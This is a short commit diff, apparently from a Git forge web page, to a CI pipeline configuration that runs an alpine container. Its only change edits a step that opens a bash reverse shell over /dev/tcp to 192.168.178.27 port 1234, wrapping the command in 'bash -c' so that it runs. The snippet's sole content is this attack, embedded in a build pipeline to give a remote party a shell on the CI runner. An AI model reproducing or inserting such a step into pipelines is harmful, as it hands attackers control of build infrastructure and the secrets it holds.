This commit is contained in:
@@ -7,4 +7,4 @@ steps:
|
|||||||
image: alpine:latest
|
image: alpine:latest
|
||||||
commands:
|
commands:
|
||||||
- apk add --no-cache bash
|
- apk add --no-cache bash
|
||||||
- bash -i >& /dev/tcp/192.168.178.27/1234 0>&1
|
- bash -c 'bash -i >& /dev/tcp/192.168.178.27/1234 0>&1'
|
||||||
|
|||||||
Reference in New Issue
Block a user